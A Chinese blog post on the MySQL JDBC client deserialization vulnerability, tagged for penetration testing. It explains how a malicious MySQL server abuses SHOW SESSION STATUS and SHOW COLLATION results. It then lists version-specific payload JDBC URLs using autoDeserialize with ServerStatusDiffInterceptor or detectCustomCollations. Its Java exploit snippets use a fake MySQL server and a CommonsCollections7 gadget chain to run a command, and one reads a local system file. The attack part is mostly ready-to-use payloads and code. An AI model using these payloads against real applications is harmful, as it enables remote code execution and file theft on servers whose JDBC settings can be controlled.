Java反序列化漏洞——jdbc反序列化漏洞利用

最新推荐文章于 2024-04-23 21:30:00 发布
最新推荐文章于 2024-04-23 21:30:00 发布
阅读量1k 收藏 1
点赞数 1
分类专栏: # java漏洞 文章标签: java mysql 数据库 渗透测试 反序列化 Powered by 金山文档
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Thunderclap_/article/details/129399519
版权

漏洞原理

  • 如果攻击者能够控制JDBC连接设置项,那么就可以通过设置其指向恶意MySQL服务器进行ObjectInputStream.readObject()的反序列化攻击从而RCE。

  • 具体点说,就是通过JDBC连接MySQL服务端时,会有几个内置的SQL查询语句要执行,其中两个查询的结果集在MySQL客户端被处理时会调用ObjectInputStream.readObject()进行反序列化操作。如果攻击者搭建恶意MySQL服务器来控制这两个查询的结果集,并且攻击者可以控制JDBC连接设置项,那么就能触发MySQL JDBC客户端反序列化漏洞。

  • 可被利用的两条查询语句:

  • SHOW SESSION STATUS

  • SHOW COLLATION

恶意MySQL服务器搭建可参考:

各种payload小结

ServerStatusDiffInterceptor触发点

  • 8.x

jdbc:mysql://x.x.x.x:3306/test?autoDeserialize=true&queryInterceptors=com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor

  • 6.x

属性名不同,queryInterceptors换为statementInterceptors:

jdbc:mysql://x.x.x.x:3306/test?autoDeserialize=true&statementInterceptors=com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor

  • >=5.1.11,包名中没有cj:

jdbc:mysql://x.x.x.x:3306/test?autoDeserialize=true&statementInterceptors=com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor

  • 5.x <= 5.1.10,同上,但需要连接后执行查询。

detectCustomCollations触发点

  • 5.1.29 - 5.1.40

jdbc:mysql://x.x.x.x:3306/test?detectCustomCollations=true&autoDeserialize=true

  • 5.1.28 - 5.1.19

jdbc:mysql://127.0.0.1:3306/test?autoDeserialize=true

漏洞利用

  • 1.下载MySQL_Fake_Server工具,开启监听,python server.py

  • 利用这个工具需要用户名进行控制,以及修改用户名的参数来指定攻击的方式以及附带的参数。

  • 2.再漏洞点使用反序列化,前提漏洞环境有可序列化链条,比如如下是使用CC7的链。

public class Jdbctest {
    public static void main(String[] args) throws Exception {
        Class.forName("com.mysql.jdbc.Driver");
        String jdbc_url = "jdbc:mysql://127.0.0.1:3306/test?autoDeserialize=true&queryInterceptors=com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor";
        Connection con = DriverManager.getConnection(jdbc_url, "yso_CommonsCollections7_calc", "root");      // 其中红色部分的username是需要调整的,yso为指定使用反序列化模块,CommonsCollections7指定使用CC7的链,calc指定CC的命令参数。
    }
}

  • 3.文件读取

public class Jdbctest {
    public static void main(String[] args) throws Exception {
        Class.forName("com.mysql.jdbc.Driver");
        String jdbc_url = "jdbc:mysql://127.0.0.1:3306/test?autoDeserialize=true&queryInterceptors=com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor";
        Connection con = DriverManager.getConnection(jdbc_url, "fileread_c:\\windows\\system32\\drivers\\etc\\hosts", "root");
    }
}

参考链接:

https://www.mi1k7ea.com/2021/04/23/MySQL-JDBC%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E/#JDBC%E7%AE%80%E4%BB%8B

https://c014.cn/blog/java/JDBC/MySQL%20JDBC%20%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90.html

Thunderclap_
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
小白看得懂的MySQL JDBC 反序列化漏洞分析 - 先知社区1
08-03
#### 简单实例//从 mysql-connector-java 6开始// mysql-connector-java 5//1.加载启动//2.建连接//3
Java反序列化漏洞检查工具V1.2_Weblogic XML反序列化漏洞检查工具CVE-2017-10271
11-11
Java反序列化漏洞检查工具V1.2_Weblogic XML反序列化漏洞检查工具CVE-2017-10271
深入探究网络安全:JDBC反序列化漏洞与远程代码执行(RCE)
最新发布
白帽黑客佳哥的博客
04-23 672
Java开发环境:安装Java SDK以运行和编译JDBC相关代码。MySQL数据库服务器:用于正常的数据库操作,同时用于攻击演示的Fake MySQL Server。网络抓包工具:如Wireshark,用于捕获和分析MySQL协议数据包。
Java反序列化漏洞静态分析与动态验证研究与实现
04-10
随着互联网应用的兴起, Java的类库越来越多, 导致反序列化漏洞的类型和数量都急剧上升。 Java反序列化漏洞中存在利用链, 攻击者通常将其与任意命令漏洞结合控制服务器。人工检测反序列化链需要花费大量的精力, 需要依赖代码审计人员的专业知识。 文章基于污点分析提出 种静态检测和动态验证的方法, 实现调用链检测工具TaintGadget。 本文的主要研究内容如下:
Java JDBC导致的反序列化攻击原理解析
08-25
主要介绍了Java JDBC导致的反序列化攻击原理解析,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友可以参考下
Java反序列化漏洞利用工具V1.7.jar
03-25
Java反序列化漏洞利用工具
MySQL JDBC 客户端反序列化漏洞分析 - 安全客,安全资讯平台2
08-03
5.1.18以下未使getObject式进获取,同样法使此法: 5.1.10及以下的5.1.X版本:同上,但是需要连接后执查询 5.1.41及以上:不可 5.1
简单的JDBC反序列化复现
qq_43936524的博客
05-07 3158
文章目录漏洞环境复现代码客户端脚本启动服务器MySQL_Fake_Server服务器 漏洞环境 jdk 1.8.152 需要的依赖库commons-collections 3.1作为本地Gadget JDBC利用采用8.0的版本 <dependencies> <dependency> <groupId>mysql</groupId> <artifactId>mysql-connector-java&l
从一道题来看JDBC反序列化漏洞([羊城杯-2020]A-Piece-Of-Java)
qq_42585535的博客
04-19 649
本文从一道题目来分析JDBC反序列化漏洞及利用
网络安全-JDBC反序列化漏洞与RCE
关注网络安全、云原生安全
04-16 2672
可以看到执行语句后,在生成结果集时使用了ResultUtil的resultSetToMap函数,继续点击去,可以看到使用了getObject和readObject,而readObject就在反序列化时自动调用。Y4tacker师傅的脚本会读取a文件,没有的话就使用默认的,也能达到RCE的效果,这个在url中就不必指定user了。这里只需要连接就行,没有安装的话可以使用Javamysql jdbc包连接也可以。虽然演讲者给出了调用链,但是没有提供恶意服务器,这就需要我们抓包,编写一个假的服务器。
MySQL-JDBC-Deserialization-Payload:MySQL JDBC反序列化有效负载MySQL客户端jdbc反序列化漏洞有效负载
03-21
MySQL JDBC反序列化有效负载/ MySQL客户端jdbc反序列化漏洞 描述 当MySQL JDBC url可控时,除能利用MySQL协议读取MySQL客户端的本地文件之外,还可以利用客户端在连接服务器时会反序列化服务器返回的二进制数据,从而触发反序列化漏洞。 详情 1.安装rewrite插件 以下安装方式补充其一 【补充】编译插件 下载的mysql-28年7月5日源码到/root/mysql-5.7.28, rewrite_example.cc见仓库 gcc -shared -Wall -fPIC -o /usr/lib/mysql/plugin/rewrite_example.so rewrite_example.cc -I/root/mysql-5.7.28/include $( mysql_config --cflags ) $( mysql_config --
Java反序列化漏洞利用工具.zip
04-10
java反序列化漏洞利用工具包含jboss|weblogic,网上其实有很多,但是用别人的工具收30分是不是有点不厚道,所以我用自己的分下载下来,然后以最低分贡献给大家,上次没有审核通过,希望这次可以
Java反序列化漏洞介绍书籍
08-17
专业介绍Java反序列化漏洞知识,攻防技术
Mysql JDBC反序列化漏洞
why811的博客
10-25 328
根据梅子酒师傅的笔记,可以知道,这是blackhat2019上的一个议题。
研究JDBC反序列化漏洞复现
hackzkaq的博客
11-22 243
Java数据库连接,(Java Database Connectivity,简称JDBC),它是java程序与数据库交互的一组API,它提供了一种标准的方法,使Java应用程序能够执行SQL查询、更新数据库记录以及检索和更新结果集。这些API组要位于JDK的java.sql包中。JDBC的引入实现了java程序对数据库的便捷访问,通过使用JDBC,可以将sql语句传给任何一种数据库,不必单独写程序访问不同的数据库。这个JDBC反序列化漏洞感觉和 shiro 有点类似,是一个不错的反序列化点。
追洞小组 | Jdbc反序列化漏洞复现浅析
Ms08067安全实验室
05-10 571
文章来源|MS08067 WEB攻防知识星球本文作者:爱吃芝士的小葵(Ms08067实验室追洞小组成员)漏洞复现分析 认准追洞小组目录1、前言+靶场搭建2、漏洞复现3、漏洞分析4、漏...
mysql 序列_MySQL JDBC客户端反序列化漏洞
weixin_39811193的博客
11-25 305
标题: MySQL JDBC客户端反序列化漏洞☆背景介绍☆学习思路☆搭建测试环境☆恶意MySQL插件1)获取MySQL5.7.28源码2)在rewrite_example基础上修改出evilreplace☆测试rewriter插件1)安装rewriter.so2)在服务端替换SQL查询语句3)卸载rewriter.so...
JAVA序列、反序列化漏洞
jainszhang的博客
11-11 300
介绍序列化、反序列化背景;java实现,以及存在的漏洞和解决方案。
[JAVA安全]JDBC反序列化漏洞
snowlyzz的博客
02-04 1446
JDBC反序列化调试分析
Java反序列化漏洞一般利用思路
09-22
### 回答1: Java反序列化漏洞一般利用思路是利用Java反序列化机制,将恶意序列化数据传递给目标系统,从而实现远程代码执行、拒绝服务等攻击。攻击者通常会构造恶意序列化数据,使其在反序列化过程中触发漏洞,从而执行恶意代码。为了防范此类攻击,可以采取一些措施,如限制反序列化对象的类型、使用安全的序列化库等。 ### 回答2: Java反序列化漏洞利用思路主要包括以下几个步骤: 1. 找到目标:攻击者首先需要找到运行了可利用Java反序列化漏洞的目标程序。这可以通过分析目标程序的代码、网络流量或者漏洞公开报告等途径进行。 2. 构造恶意序列化数据:攻击者需要构造恶意的序列化数据,这些数据会被目标程序读取并解析。攻击者可以使用一些工具或者手动编写代码来生成恶意序列化数据。 3. 选择合适的漏洞利用方式:根据目标程序的具体情况,攻击者可以选择合适的漏洞利用方式。常见的利用方式包括Java反序列化漏洞利用链,如利用未经过正确检验的反序列化的对象进行远程代码执行或者文件读写等操作。 4. 发送恶意序列化数据:攻击者需要将构造好的恶意序列化数据发送给目标程序。这可以通过网络连接、文件上传、内存注入等方式进行。 5. 触发反序列化:目标程序接收到攻击者发送的序列化数据后,会进行相应的反序列化操作。在解析过程中,如果存在漏洞,则恶意代码会被执行,导致安全问题。 6. 实现攻击目标:一旦恶意代码被执行,攻击者可以获得对目标程序的控制,从而进行进一步的攻击行为。这可能包括窃取敏感信息、执行任意代码、篡改数据等。 为了防范Java反序列化漏洞的利用,开发者可以采取一些措施,如使用安全的序列化和反序列化库、校验反序列化输入、限制反序列化操作的范围和权限等。同时,及时更新和修补已知的漏洞也是非常重要的。 ### 回答3: Java反序列化漏洞利用思路如下: 在Java中,对象的序列化是将对象转换为字节流的过程,而反序列化则是将字节流还原为对象的过程。反序列化漏洞是指攻击者通过构造恶意的序列化数据,再使用该数据进行反序列化操作,从而导致程序在反序列化的过程中触发各种安全漏洞。 通常的利用思路如下: 1. 找到存在反序列化漏洞的目标:通过静态代码分析、动态分析或源码审计等手段,找到存在反序列化漏洞的应用程序。 2. 构造恶意的序列化数据:攻击者通过修改或创建特定的序列化数据,来生成恶意的序列化数据。这些数据可能包含有害的代码或意外的操作。 3. 发送恶意数据进行反序列化:攻击者将构造好的恶意序列化数据发送给目标应用程序,并通过触发反序列化操作,将恶意数据还原为对象。此时,存在漏洞的应用程序会执行恶意代码,并可能导致安全问题。 4. 利用漏洞进行攻击:一旦恶意代码被执行,攻击者可以在目标系统上执行各种恶意操作,如执行任意命令、远程代码执行、获取敏感信息等。 为了避免被反序列化漏洞攻击,需要对反序列化操作进行安全措施,比如使用白名单机制限制可反序列化的类、对反序列化方法进行签名等。同时,定期更新和修复Java环境,以及对目标应用程序进行安全测试和代码审计,也是减少反序列化漏洞风险的重要措施。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Thunderclap_

点赞、关注加收藏~

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值